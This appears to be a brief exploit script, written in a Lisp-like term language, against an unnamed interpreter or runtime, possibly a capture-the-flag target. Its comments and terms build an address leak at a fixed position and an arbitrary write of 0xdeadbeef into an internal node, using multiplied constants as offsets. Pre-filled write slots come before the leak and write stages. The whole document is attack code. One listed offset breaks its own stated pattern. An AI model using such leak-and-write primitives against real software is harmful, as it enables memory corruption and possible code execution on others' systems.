// There's some address at position 1049301
// Ctr(1, N=2, 1049301)
(Leak1) = (* 1945917207 3591923955)

// Some offsets are not suitable to be generated with multiplication
// Lam(1) = 2305843009213693953 = 3 * 768614336404564651

// Lam(7) = 2515077533 * 916807923
// Executed as node[12345] = 0xdeadbeef = 3735928559
(Write1) = ((* 2515077533 916807923) 3735928559)

// Pre-fill write offset (1, 3, 5, ...)
// with desired values
(Main) = (
    (
        Exploit
        1 0
        3 0
        5 0
        60 0
        9 0
        11 0
        13 0
        15 0
    )
    (
        Exploit
        17 0
        19 0
        21 0
        23 0
        25 0
        27 0
        29 0
        31 0
    )
    (Leak1)
    (Write1)
)
